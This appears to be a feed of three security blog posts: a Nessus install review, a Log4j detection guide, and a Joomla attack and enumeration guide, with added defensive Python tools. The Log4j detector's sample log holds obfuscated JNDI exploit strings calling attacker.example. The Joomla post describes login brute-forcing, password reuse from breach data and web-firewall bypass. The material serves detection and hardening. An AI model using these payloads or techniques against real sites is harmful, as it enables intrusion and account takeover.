(Reading database ... 343156 files and directories currently installed.)
Preparing to unpack Nessus-10.0.0-ubuntu1110_amd64.deb ...
Unpacking nessus (10.0.0) ...
Setting up nessus (10.0.0) ...
Unpacking Nessus Scanner Core Components...
Created symlink /etc/systemd/system/nessusd.service -> /lib/systemd/system/nessusd.service.
Created symlink /etc/systemd/system/multi-user.target.wants/nessusd.service -> /lib/systemd/system/nessusd.service.  

 - You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
 - Then go to https://192.168.1.123:8834/ to configure your scanner

At the prompt, start the Nessus scanner service:

user@acidburn:~$ sudo /bin/systemctl start nessusd.service

Now check the status to see if it is active/running with systemctl status nessusd

user@acidburn:~$ systemctl status nessusd

Head to the URL listed in the output of the install script. Nessus Essentials is selected by default. The activation code received relates to the version selected. Work your way through the screens as shown below.
[Image: flowchart of Nessus setup screenshots]

After setting an admin password during the web based configuration, I promptly managed to forget it. Reset the Nessus admin password easily using the nessuscli utility:

user@acidburn:~$ sudo /opt/nessus/sbin/nessuscli chpasswd admin

[Image: Nessus login page]

Nessus Management Console

After logging in for the first time you are presented with this popup. Launch a host discovery scan to identify which hosts on your network are available to scan. You can choose to do this now, or close the popup and come back to the "Host discovery scan" under the "New Scans" page.

[Image: Nessus welcome popup in the management console]

It's a simple interface and straightforward to create a new scan. There is an option to create a New Folder, allowing you to keep your scans organised. Once created, this folder will appear on the left side under My Scans.

Settings

Settings provides information on the version, last update, licence expiration, and Licensed Hosts, indicating how many of the 16 free scans you have used. From the menu on the left, you can access a variety of things such as Proxy Server, Password Management, and 'My Account'. There are a lot more settings to look through, but for this post nothing needed to be configured and we stuck with the default setup.

[Image: Nessus web console settings]

Create a Nessus Scan

Creating a scan is easy enough. Click on the "+ New Scan" button or "Create a new scan".
This takes you to the Scan Templates screen. Many users only use the default scan option, so clearly defining the available options as Basic Network Scan, Advanced Scan, Web App Tests and Malware Scan helps the user understand the scope of the test. Scrolling down the page shows other options, including those that require an upgrade to Professional to access.

An example is the Basic Network Scan option (see screenshot below); it's easy to see what information goes where. In this instance we stuck with the default setup, added the target information, and saved the scan.

For the scan target, you can enter a hostname, an IP address or a network range.

[Image: Nessus scan template]

Launch a Nessus Scan

From this page we can see previously run scans and the newly added scan. The Last Modified column shows the run time of previously launched scans. Here you can also select the play button to run the new scan (appearing at the bottom of the list) or re-run a previous scan. Once launched, the scan jumps to the top row and goes about its scanning.

Nessus Report and Detection

The test scan did a good job of detecting missing updates on the test Ubuntu system. For those unfamiliar with vulnerability scanners, I recommend you take a look at the options to customise the scan policies. One of the most important configuration options for basic network scans is to ensure you are performing a credentialed scan. This allows much more in-depth coverage of the target, as the scanner is able to interrogate the system for installed software and packages, giving the scan engine valuable information such as the patch level of both Windows and Linux based targets.

[Image: Nessus scan results showing number of vulnerabilities located]

Malware detection with Nessus

An interesting feature of Nessus is the known malware detection feature. Malware has been a problem since the days of the first boot loader viruses; however, in today's world of ransomware the threats are widespread and potentially devastating to an organisation.

The security industry is creating all manner of network based anomaly detection products to discover unknown malware. This capability seems quite simple and one I suspect will be beneficial to many organisations.

As the Nessus scanner performs a credentialed scan of a system, it can collect hashes of all the running processes and compare these to an online database that is effectively a clone of a system such as VirusTotal. This immediately adds a new layer of defence to your anti-virus capability: if your primary AV client misses a piece of malware, your regular Nessus scan may still catch it. Understand, however, that like any AV detection it will not find everything.
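
The mechanism just described, hashing what is running and looking the hashes up in a reputation set, is simple enough to show end to end. The block below is an added example and not Nessus code: the "reputation database" is a constructed set of SHA-256 hashes standing in for a VirusTotal-style lookup, and the demo hashes constructed files in a temporary directory rather than real processes. On Linux, `running_executables()` collects the real binaries via the `/proc/<pid>/exe` symlinks (reading every one of them needs root). The demo also shows the blind spot the paragraph warns about: a sample that differs by a single byte produces a different hash and is not flagged.

```python
"""Hash-and-lookup check of running binaries (added example, not Nessus code)."""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path, chunk=1 << 16):
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def running_executables():
    """Linux: the binary behind each live process is the /proc/<pid>/exe symlink.
    Processes whose binary was deleted or is unreadable are skipped."""
    paths = set()
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            paths.add(os.readlink(f"/proc/{pid}/exe"))
        except OSError:
            continue
    return sorted(paths)


def check_binaries(paths, known_bad_hashes):
    """Return {path: sha256} for every file whose hash is in the reputation set."""
    hits = {}
    for p in paths:
        try:
            digest = sha256_file(p)
        except OSError:
            continue
        if digest in known_bad_hashes:
            hits[str(p)] = digest
    return hits


def demo():
    """Constructed sample: an exact copy of a known-bad sample is caught; a variant
    that differs by one appended byte is not, which is the blind spot of hash matching."""
    d = Path(tempfile.mkdtemp())
    bad_sample = b"MZ\x90\x00 constructed sample bytes, not real malware"
    (d / "copy_of_known_bad.bin").write_bytes(bad_sample)
    (d / "one_byte_variant.bin").write_bytes(bad_sample + b"\x00")
    (d / "benign.sh").write_bytes(b"#!/bin/sh\necho hello\n")
    reputation_db = {hashlib.sha256(bad_sample).hexdigest()}  # constructed stand-in for an online lookup
    hits = check_binaries(sorted(d.iterdir()), reputation_db)
    return sorted(Path(p).name for p in hits)


if __name__ == "__main__":
    print("flagged in demo:", demo())
    # On a live Linux host, with your_known_bad_hash_set being a set of SHA-256 strings:
    # print(check_binaries(running_executables(), your_known_bad_hash_set))
```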

Nessus Command Line Scanning

So, the question is: with Nessus Essentials, can a scan be run from the command line? The short answer is no. Nor can it be done with a Nessus Pro account. In previous versions more could be done via the command line; now, other than the initial setup and changing passwords, all scans are done via the GUI.

Nessus API access

What can we do with the API? Scans can't be run via the API either. According to the answer on the community Q&A, this function is only available in the Tenable.sc or Tenable.io consoles.

Conclusion

Overall, Nessus Essentials 10 is relatively easy to deploy and configure. You can be up and running within 15-20 minutes. This has been a quick review, further testing would be required to see how it scales on a large network and how comprehensive the vulnerability detection plugins are.

It is preferable to have multiple vulnerability scanner options available. Having more than one assists in correlation and provides an assurance that a vulnerability missed by one scanner may be picked up by the second. Our online OpenVAS scan based on the Greenbone Vulnerability Manager is an effective second assessment option, particularly when reviewing Internet-facing systems.

Detection of Log4j Vulnerability https://hackertarget.com/detection-of-log4j-vulnerability/ Sun, 12 Dec 2021 02:58:00 +0000

On the 9th of December 2021, the world became aware of a critical RCE vulnerability in the Log4j open source package that is buried in the software stacks of many organisations (CVE-2021-44228).

Versions of Log4j2 >= 2.0-beta9 and <= 2.16 are all affected by this vulnerability. The vulnerability is easy to exploit and is currently being exploited in the wild.

The CVE is rated 10, and while it is not the first with such a high level, the big problem with this one is the Log4j software is deployed in systems where many will not even realise. It is a Java based dependency of other common software solutions. The scope and impact of this vulnerability won't be fully understood for some time.

Exploitation can occur through a range of vectors, such as stuffing the simple exploit code into a HTTP User Agent, HTTP Referrer, as well as any user supplied input such as web forms and login portals.

Who and What is affected

Product and vendor information can be found at this link that is being updated as new information becomes available.

A small sample of what is affected:
  • Minecraft (server and java clients)
  • VMware vCenter + many more products
  • Apache Tomcat (not by default but if configured)
  • Apache Solr
  • Logstash
  • Elasticsearch
  • Graylog
  • Security Onion
  • Cisco Products (multiple *under investigation)
  • UniFi Network Application
  • ZAP Proxy

Remediation of CVE-2021-44228

A number of remediation options are available:

Summary: Upgrade to Log4j version 2.17.0 or implement recommended vendor mitigation advice immediately

Best Option: Patch the Log4j library

Updating Log4j to a secure version (2.17.0, which supersedes the earlier 2.16.0 recommendation) is the best way forward. Note that the older 1.x versions are not vulnerable to this issue; they have been out of support for many years, but as they are not affected they are not an immediate priority.

Second Option: Disable the Lookup Function

Unfortunately, there are going to be many outdated Java based systems running in organisations around the world where an upgrade is not an easy option. The system administrators may even be hesitant to touch the system in the event that they break it. Patching is not always an easy fix.

Disabling the Lookup function of the Log4j package is the next best bet. Note that the latest information is that disabling the Lookup function does not fully mitigate the vulnerability. As the issue is still evolving, the best strategy is to check the vendor advice. Specific mitigations may be required, depending on the deployment.

 -Dlog4j2.formatMsgNoLookups=true 

Firewall Application Server (outbound)

Current exploits require the Log4j server to make a connection to another (attacker controlled) system. If possible, firewall outbound connections from the app server, as this will block many attacks. Note that in this case DNS exfiltration of data is still possible if the app server can resolve external DNS (likely).

The use of a firewall is not a fix but it is one layer of defence - and could potentially be implemented quickly.

Detecting the Vulnerability

We now have the ability to detect vulnerable Log4j systems using the latest OpenVAS signatures (rolled out 14/12/21 1600 UTC). The excellent team at Greenbone Networks (OpenVAS/GVM feed maintainers) released new signatures for detecting the vulnerability. In our testing before deployment we confirmed successful detection against a number of vulnerable lab systems. We are monitoring the situation closely and will release any updates as they become available and more information comes to hand.

The network based OpenVAS signatures use a similar detection method as those being deployed in much of the scanning that is currently taking place. If a vulnerability is found on an Internet facing system, immediately examine the vulnerable system for indicators of compromise. It is possible the system has already been exploited through opportunistic scanning.
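
When examining a system for indicators of compromise, the first place to look is the web server and application logs for the lookup string itself. The following is an added example, not part of this post or of any scanner: it scans log lines for JNDI lookups. The log lines are constructed in Apache combined format, with the reserved name attacker.example standing in for a callback host. Log4j resolves nested lookups such as `${lower:j}` and `${x:-y}` before it performs the JNDI lookup, so a detector that only greps for the literal `${jndi:` misses requests that hide the string inside them; the normaliser below resolves those inner lookups the same way, purely for matching, and percent-decodes the line first because request lines are usually URL-encoded in logs.

```python
"""Find Log4j JNDI lookup strings in web logs (added example; indicators of attempts, not proof of compromise)."""
import re
from urllib.parse import unquote

_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_INNER = re.compile(r"\$\{([^${}]*)\}")  # an innermost ${...} with no nested braces


def _resolve_one(s):
    """Replace the first innermost ${...} with what Log4j would substitute; None if none left."""
    m = _INNER.search(s)
    if m is None:
        return None
    body = m.group(1)
    if ":-" in body:                      # ${anything:-default} -> default
        repl = body.split(":-", 1)[1]
    elif body[:6].lower() == "lower:":    # ${lower:X} -> x
        repl = body[6:].lower()
    elif body[:6].lower() == "upper:":    # ${upper:x} -> X
        repl = body[6:].upper()
    else:                                 # env:, sys:, date: ... keep the text, drop the braces
        repl = body
    return s[: m.start()] + repl + s[m.end():]


def contains_jndi_lookup(text, max_rounds=50):
    """True if the text contains a JNDI lookup, directly or after resolving nested lookups."""
    s = unquote(text)                     # request lines are usually percent-encoded in logs
    for _ in range(max_rounds):
        if _JNDI.search(s):
            return True
        s = _resolve_one(s)
        if s is None:
            return False
    return False                          # pathological nesting depth; give up


def scan_log(log_text):
    """Return [(line_number, line)] for every line that carries a JNDI lookup."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if contains_jndi_lookup(line)]


# Constructed sample log: one benign request, then lookup attempts in the User-Agent,
# the Referer and the (percent-encoded) query string, with increasing obfuscation.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:22:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:22:15:30 +0000] "GET /login HTTP/1.1" 200 812 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}" "curl/7.68.0"
203.0.113.11 - - [10/Dec/2021:22:16:02 +0000] "POST /search?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Adns%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 200 91 "-" "python-requests/2.26"
"""

if __name__ == "__main__":
    for n, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: {line[:90]}")
```

A hit means someone sent the string; whether the lookup succeeded is a separate question, answered by outbound LDAP/RMI/DNS connections from the application server in the same time window, which is exactly the traffic the outbound firewall rule above is meant to stop.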

Vulnerability Scanning for Log4J

Vulnerability scanners (including OpenVAS / Greenbone Vulnerability Manager, Nessus, etc.) using remote-only testing will catch the low-hanging fruit: the easily accessible and exploitable Internet-facing systems. We have tested the newly released signatures from Greenbone Networks in our lab and can confirm that they detected a vulnerable version of Apache Solr remotely.

Keep in mind that no vulnerability scanner is 100% accurate. With this vulnerability in particular, it is unlikely that a vulnerability detection will be released that can definitively say the vulnerability is present with a remote-only scan. The problem is that the attack surface is huge and varied. The number of places the malicious string could find its way to an instance of Log4j is almost endless.

Knowing your Software (assets)

The ideal solution for detection is knowing the software you have running within your organisation (accurate asset register) and the ability to patch and update software as required.

Use attack surface mapping tools and vulnerability scanners to find the gaps in your organisation's network knowledge. Get answers to the following questions: what services are you running, and what sites are running on those services? This gives an immediate benefit in the triage process, allowing you to identify which systems to remediate as a priority.
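
Knowing which copies of Log4j you are running is the asset question in practice, and Java packaging makes it harder than it sounds because log4j-core is routinely bundled inside .war and .ear files. The block below is an added example, not part of this post or of any vendor tool: it walks a directory tree, opens every archive, recurses into archives embedded in archives, reads the Maven descriptor that log4j-core jars carry at META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties, and flags any version below 2.17.0, the upgrade target given in the summary above. The sample archives that `demo()` lays out are constructed and contain only that descriptor plus a placeholder class entry.

```python
"""Inventory Log4j 2 jars on disk, including jars nested in .war/.ear (added example)."""
import io
import re
import tempfile
import zipfile
from pathlib import Path

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = {".jar", ".war", ".ear", ".zip"}
UPGRADE_TARGET = "2.17.0"   # per the remediation summary above


def version_key(v):
    """Sortable key: '2.0-beta9' < '2.0' < '2.14.1' < '2.17.0'."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([0-9A-Za-z.]+))?$", v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version {v!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1, pre or "")


def needs_upgrade(v):
    return version_key(v) < version_key(UPGRADE_TARGET)


def find_log4j(data, location):
    """Return [(location, version)] for every log4j-core in an archive, recursing into
    embedded archives (e.g. WEB-INF/lib/log4j-core-*.jar inside a .war)."""
    found = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return found
    with archive:
        names = archive.namelist()
        if POM in names:
            for line in archive.read(POM).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    found.append((location, line.split("=", 1)[1].strip()))
        for name in names:
            if Path(name).suffix.lower() in ARCHIVES:
                found.extend(find_log4j(archive.read(name), f"{location}!{name}"))
    return found


def scan_tree(root):
    """Walk a directory; return [(location, version, needs_upgrade)] for each hit."""
    results = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVES:
            for loc, ver in find_log4j(p.read_bytes(), str(p)):
                results.append((loc, ver, needs_upgrade(ver)))
    return results


def _fake_log4j_core(version):
    """Constructed jar carrying only the Maven descriptor and a placeholder class entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        z.writestr("org/apache/logging/log4j/core/lookup/JndiLookup.class", b"placeholder")
    return buf.getvalue()


def demo():
    """Lay out a constructed tree: two loose jars plus one jar embedded in a .war."""
    root = Path(tempfile.mkdtemp())
    (root / "lib").mkdir()
    (root / "lib" / "log4j-core-2.14.1.jar").write_bytes(_fake_log4j_core("2.14.1"))
    (root / "lib" / "log4j-core-2.0-beta9.jar").write_bytes(_fake_log4j_core("2.0-beta9"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.17.0.jar", _fake_log4j_core("2.17.0"))
        z.writestr("WEB-INF/web.xml", "<web-app/>")
    (root / "app.war").write_bytes(war.getvalue())
    return sorted((ver, flagged) for _, ver, flagged in scan_tree(root))


if __name__ == "__main__":
    for loc, ver, flagged in scan_tree("."):
        print(f"{'UPGRADE' if flagged else 'ok     '} {ver:<10} {loc}")
```

Run `scan_tree("/opt")` (or wherever your Java applications live) and feed the flagged locations into the triage list; a jar with no descriptor is reported as nothing, so treat a silent result on a host known to run Java as "unknown", not "clean".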

Detection using Canary Tokens

An interesting honeypot option is available for quick testing of an application. A canary token is a unique, monitored URL or hostname: the service watches for hits on it and alerts you when one arrives.

The Canary Tokens are made available for Free by Thinkst Canary - a very well-respected company within the Infosec space.

How the Canary Token Works

The smart people at Thinkst Canary have released a log4j token that will alert you to a successfully triggered Log4j exploit vector.

Getting Started

It's an amazing service, you don't even need to create an account:

1. Create a token, entering your email address for the alert to be sent to.
2. Copy the Log4j trigger code and use it in any forms or input you wish to test within your organisation.

Do not use this without authority in your organisation. Your Blue (Security) team will be working hard to fix and detect attempts to exploit this vulnerability. If you start throwing this code snippet around you will likely trigger detections that may distract the security team from fighting real fires.

In the example below, we tested the token against an old version of Graylog running in our lab. Pasting the code snippet straight into the search triggered the canary token alerting me to the fact that the vulnerability was present.

The alert was immediate and came straight into my inbox.

After adding the -Dlog4j2.formatMsgNoLookups=true parameter to the Elasticsearch jvm.options, we tried the same Elasticsearch query and found that the token did not trigger. This confirms both that the vulnerability was present initially and that it has now been remediated.

Wrapping Up

For many security / operations teams the next weeks (or months) will be a challenge. We wish you all the best and we will keep monitoring the situation updating this blog post as needed.

Further Resources

Youtube Internet Storm Center Update - Good information from the Sans ISC.
CERT (CH) - Swiss Government Computer Emergency Response Team
Apache Log4j Security Vulnerabilities - Apache Logging Services pages listing the security vulnerabilities fixed in released versions of Apache Log4j 2
NVD: National Vulnerability Database CVE-2021-44228 Detail

Attacking and Enumerating Joomla https://hackertarget.com/attacking-enumerating-joomla/ Wed, 29 Jul 2020 03:16:00 +0000

Discover the tips and techniques used to attack and break into Joomla based websites. An understanding of these hacker techniques will enable you to be prepared to keep your sites secure.

Additionally, penetration testers or red teams needing to exploit Joomla targets will also find practical hints in this guide.


Introduction to Joomla Security

Recent statistics show Joomla is a popular open-source Content Management System (CMS), with close to 6% of all websites.

It is open-source, free to download, and easy to use. These things make it a popular option. Similar to WordPress's plugins, Joomla allows functionality through "Extensions".

This popularity makes it a target for bad guys aiming to use a compromised web server for malicious purposes.

A lot of Joomla security holes arise from lack of maintenance, not taking passwords seriously, poorly coded extensions and even site backups left in the web root.

Enumeration and Reconnaissance

Stage 1 is to discover as much technical information as possible regarding the site configuration. This information is essential, as it will aid us as we move on to the actual attacking or exploitation phase.

Now is the time to put yourself in the hacker's mindset. Enumeration or reconnaissance can be conducted stealthily with regular web requests used to gather technical information about the site. Or it can be conducted overtly by aggressively brute-forcing web paths to identify the presence of extensions.

Joomla Identification & Version

To determine if the site is running Joomla and identify the Joomla core version, three simple methods can be used.

Meta Generator

Check the HTML source of the page for a meta generator tag in the HEAD section of the HTML source. This is the simplest way to determine if Joomla is being used.

This example is taken from the source of a default Joomla install.

<meta name="generator" content="Joomla! - Open Source Content Management" />

joomla.xml

To identify the version we can check the joomla.xml file within the directory /administrator/manifests/files/

https://www.joomla.org/administrator/manifests/files/joomla.xml

[Image: Joomla core version detection result]

/language/en-GB/en-GB.xml

Another option to find the version is the language file.

https://example.site/language/en-GB/en-GB.xml
<version> 3.6.5 </version>

Version in README.txt

If the meta tag has been disabled, check for the presence of /README.txt from the web root of the install. Joomla has the major version at the top of the ReadMe file.

[Image: Joomla README example]
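
Turned around, the three sources above plus README.txt are a checklist for a site owner: each one you can read is version information you are disclosing. The following is an added example, not code from HackerTarget's Joomla scanner, that audits a site for these disclosures. `audit()` takes any `fetch(path) -> (status, body)` callable, `urllib_fetch()` builds a real one for your own site, and `sample_fetch()` serves a constructed site for the demo. The README pattern is an assumption (it takes the first "Joomla! <number>" in the first 20 lines); the XML parsing relies on the top-level `<version>` element that both manifest files shown above carry.

```python
"""Audit the version information a Joomla site discloses (added example, not HackerTarget's scanner)."""
import re
import xml.etree.ElementTree as ET

PATHS = {
    "meta generator": "/",
    "joomla.xml": "/administrator/manifests/files/joomla.xml",
    "en-GB.xml": "/language/en-GB/en-GB.xml",
    "README.txt": "/README.txt",
}


def meta_generator(html):
    m = re.search(r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']*)["\']', html, re.I)
    return m.group(1) if m else None


def version_from_manifest(xml_text):
    """joomla.xml and en-GB.xml both carry a top-level <version> element."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    node = root.find("version")
    return node.text.strip() if node is not None and node.text else None


def version_from_readme(text):
    """Assumed README layout: the first 'Joomla! <number>' near the top is the major version."""
    m = re.search(r"Joomla!?\s+v?(\d+(?:\.\d+)*)", "\n".join(text.splitlines()[:20]))
    return m.group(1) if m else None


PARSERS = {
    "meta generator": meta_generator,
    "joomla.xml": version_from_manifest,
    "en-GB.xml": version_from_manifest,
    "README.txt": version_from_readme,
}


def audit(fetch):
    """Return {source: disclosed value or None}; None means unreachable or nothing found."""
    report = {}
    for source, path in PATHS.items():
        status, body = fetch(path)
        report[source] = PARSERS[source](body) if status == 200 else None
    return report


def urllib_fetch(base_url, timeout=10):
    """Build a fetch() for your own site, e.g. audit(urllib_fetch("https://example.site"))."""
    from urllib.error import HTTPError
    from urllib.request import Request, urlopen

    def fetch(path):
        req = Request(base_url.rstrip("/") + path, headers={"User-Agent": "joomla-self-audit"})
        try:
            with urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except HTTPError as err:
            return err.code, ""
    return fetch


# Constructed sample site: generator tag left in, both XML manifests reachable, README removed.
SAMPLE_SITE = {
    "/": '<html><head><meta name="generator" content="Joomla! - Open Source Content Management" /></head></html>',
    "/administrator/manifests/files/joomla.xml":
        '<extension version="3.6" type="file" method="upgrade"><name>files_joomla</name><version>3.6.5</version></extension>',
    "/language/en-GB/en-GB.xml":
        '<metafile version="3.6" client="site"><name>English (en-GB)</name><version>3.6.5</version></metafile>',
}


def sample_fetch(path):
    body = SAMPLE_SITE.get(path)
    return (200, body) if body is not None else (404, "")


if __name__ == "__main__":
    for source, value in audit(sample_fetch).items():
        print(f"{source:<15} {value or '(not disclosed)'}")
```

Anything the audit returns is information an attacker's passive scan gets for free: the generator tag can be cleared from the template, and the two XML manifests and README.txt can be denied to anonymous requests at the web server. None of this replaces keeping the core up to date, since the extension and template enumeration below does not need the version at all.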

Security Vulnerabilities in Joomla Core

Let's say a site with an older Joomla Core version is discovered by an attacker. This site may be directly exploitable via a security vulnerability in the Joomla core. It also shows the site is not being well maintained.

In a poorly maintained site, other components, such as Extensions or Templates, may not be updated. The likelihood of a successful attack has dramatically improved.

Joomla Extension and version Enumeration

Similar to WordPress's plugins, Joomla allows functionality through "Extensions". Extensions are broken down into a few types:

  • Modules
  • Components
  • Templates
  • Plugins
  • Languages

All can be installed as required. Vulnerabilities can arise in any of these when they are poorly coded; an example would be unauthenticated users having access to the same features as logged-in users.

Enumeration is attempting to find as many installed extensions as we can, including disabled extensions. Knowing these extensions may allow us to identify the version, and research whether it is vulnerable to known exploits.

Unfortunately, unless you have the administrator account details, there is no easy way to find every single extension of a particular Joomla install.

It is worth noting Joomla has a live list called - Vulnerable Extensions List (VEL)
This list is of vulnerable extensions for which no patch is known to exist. It can be used as a source of information or a place to start when looking at a Joomla site.

Passive

Hints to the extensions and modules present in a site may be found in the HTML source of the page. Once an add-on is identified, additional information can be gathered from its manifest file.

Active

Some extensions do not leave traces in the HTML source. To find all the installed extensions you have to be more aggressive. Several tools can brute force known extension/component lists. There is no one-size-fits-all when it comes to Joomla; using a combination of available tools will get the best results.

One example is the Metasploit Joomla Plugin Scanner. This metasploit auxiliary module uses a wordlist to locate valid paths scanning for extensions and vulnerabilities.

Extension Version Enumeration

You have compiled a list of extensions of the site, now for the version. The design of Joomla means this information isn't forthcoming or comprehensive, especially when attempting to find it quietly.

You may find the extension version in a manifest file or in other resources such as the add-on's stylesheets or JavaScript.

With a valid version you can compare what has been found against known exploits. This comparison indicates whether the site is likely vulnerable before throwing any exploits.

Joomla Template Enumeration

As with extensions, Joomla Templates can contain vulnerabilities that may expose the site to compromise. Templates are simply collections of PHP code with HTML and CSS resources. Complex templates have additional components and are more prone to security vulnerabilities.

Enumeration of the template is conducted similarly to detecting the extensions. Inspect the HTML and locate the template. Alternatively, run a passive scan on Hacker Target's Joomla Security Scan and scroll through results to find the Joomla Template.

[Image: Joomla template enumeration]


One important factor when testing for vulnerable Joomla Templates and components is where it may be installed but not active; as the code is still accessible it may still be vulnerable. For this reason, brute force testing for template paths is an additional step when assessing an unknown Joomla installation.

Enumerate Users

A quick first check is whether the Administrator login page is publicly available.

https://exampledomain.com/administrator
Gather a list of valid usernames and attempt a password guessing attack to brute force the login credentials. The aim is to gain access to the administrator account. Admin access gives the attacker complete access, and consequently a full compromise of the site, the database, and remote code execution on the server through PHP code execution.

There is no simple way to do this manually in Joomla as opposed to WordPress where it may be possible to iterate through the users using a simple bash one-liner.

[Image: Joomla login form]

With Joomla, it requires guesswork. All new installs have a 'Super Administrator account' called admin. As part of the install, Joomla requests a password for this account. Joomla also suggests changing the name of the account from 'admin' to something more difficult to guess.

This complicates a dictionary-based attack against the admin panel.

Enumerating users through Guessing

Start with the common one admin and go from there.

Joomla does not appear to allow direct listing of all users or to leak their information.

A default install of Joomla allows 3 privileged user groups which have access to the control panel:

  • Managers: content creation and backend system info.
  • Administrators: admin functions except global options.
  • Super Users/Administrator: ultimate power. Access all areas.

Note: from version 3.2 two-factor authentication was implemented as a core feature. Admins can enable it from User Manager in the Control Panel.

Password Re-use and Breach Datasets


A common technique used in targeted attacks is mining breach datasets for passwords. If a user is breached on another site, there is a chance they will use the same password, or a variation of it, on other sites. Working from a targeted domain, passwords can quickly be found, especially in larger organisations.

Directory Indexing

A misconfigured server can allow you to view the contents of a directory in a web-accessible path.

Viewing the contents of the directory allows an attacker to gather sensitive information not intended for public viewing about the existence and contents of the files. Such as hidden files, backup files, config files, plugins, and templates, without the need to brute force the paths.

Start by browsing to folder locations and check whether you get a 200 OK HTTP response with a list of files and folders in the browser.

[Image: example of directory indexing]
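
The same check is worth automating across your own Joomla directories, because a listing is only dangerous for what it reveals. The block below is an added example, not HackerTarget's scanner code: it recognises the default Apache autoindex page (an "Index of /path" title and a "Parent Directory" link), pulls the listed entries out of it, and reports only those with extensions that should never be web-accessible (backups, database dumps, config copies, logs). It takes a `fetch(path) -> (status, body)` callable; the responses served by `sample_fetch()` are constructed, and the candidate directory list is an assumption you should extend with whatever your install adds.

```python
"""Detect directory listings and flag listed files that should not be public (added example)."""
import re
from html import unescape

# Default Apache autoindex pages carry an "Index of /path" title.
_LISTING = re.compile(r"<title>\s*Index of\s+/", re.I)
# Entry links; sort links start with "?" and the parent link with "/", both skipped.
_ENTRY = re.compile(r'<a\s+href="([^"?/][^"]*)"', re.I)
SENSITIVE = re.compile(
    r"\.(bak|old|orig|save|swp|sql|sql\.gz|zip|tar|tar\.gz|tgz|7z|rar|log|ini|env)$", re.I)

# Joomla directories worth checking (assumed list; extend for your install).
CANDIDATE_DIRS = ["/administrator/backups/", "/administrator/logs/", "/images/", "/cache/",
                  "/tmp/", "/logs/", "/templates/", "/components/", "/modules/", "/plugins/"]


def is_directory_listing(status, body):
    return status == 200 and _LISTING.search(body) is not None


def listed_entries(body):
    """File and sub-directory names shown in the listing, in page order."""
    return [unescape(name) for name in _ENTRY.findall(body)]


def sensitive_entries(body):
    return [name for name in listed_entries(body) if SENSITIVE.search(name)]


def audit_listings(fetch, dirs=CANDIDATE_DIRS):
    """{path: [sensitive files]} for every candidate directory that returns a listing."""
    report = {}
    for d in dirs:
        status, body = fetch(d)
        if is_directory_listing(status, body):
            report[d] = sensitive_entries(body)
    return report


# Constructed responses: one listing exposing backups, one harmless listing, one 403.
SAMPLE = {
    "/administrator/backups/": (200, (
        '<html><head><title>Index of /administrator/backups</title></head><body>'
        '<h1>Index of /administrator/backups</h1><table>'
        '<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th></tr>'
        '<tr><td><a href="/administrator/">Parent Directory</a></td></tr>'
        '<tr><td><a href="site-2020-06-01.sql.gz">site-2020-06-01.sql.gz</a></td></tr>'
        '<tr><td><a href="configuration.php.bak">configuration.php.bak</a></td></tr>'
        '<tr><td><a href="readme.txt">readme.txt</a></td></tr></table></body></html>')),
    "/images/": (200, '<html><head><title>Index of /images</title></head><body>'
                      '<a href="/">Parent Directory</a> <a href="logo.png">logo.png</a> '
                      '<a href="banners/">banners/</a></body></html>'),
    "/templates/": (403, "<html><head><title>403 Forbidden</title></head></html>"),
}


def sample_fetch(path):
    return SAMPLE.get(path, (404, ""))


if __name__ == "__main__":
    for path, files in audit_listings(sample_fetch).items():
        print(path, "is listable; sensitive entries:", files or "none")
```

Any directory the audit reports should get `Options -Indexes` in the Apache vhost or .htaccess (nginx leaves `autoindex` off unless someone enabled it), and the flagged files should be moved out of the web root altogether; a listing that shows only images is a configuration slip, a listing that shows a database dump is an incident.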

Network Service Discovery

Here we are checking network services. The main technique used for identifying the server's attack surface is port scanning.

An Nmap port scan will identify the network services listening on the server. These could include FTP, SSH, Webmin or even the web server itself. Working from the results of the Port Scan an attacker would identify server applications, versions and look for exploitation opportunities.

Bypass Sucuri or CloudFlare Web Firewall

If the Joomla site is protected by Sucuri or CloudFlare, exploits that might otherwise succeed could be blocked. Even various reconnaissance techniques can be blocked by these web application firewalls (WAFs).

By knowing the real IP address of the server it is likely we could bypass the firewall simply by putting an entry in the client's /etc/hosts file. This works because we bypass the site's DNS, which would otherwise send us via the web firewall.

Historical DNS Records

A common method is using historical DNS records to identify the real IP address.

  • Historical DNS records may show the original IP address before the firewall service was implemented.
  • Mail records (MX): if mail is hosted on the same server as the website, this will reveal the real host.
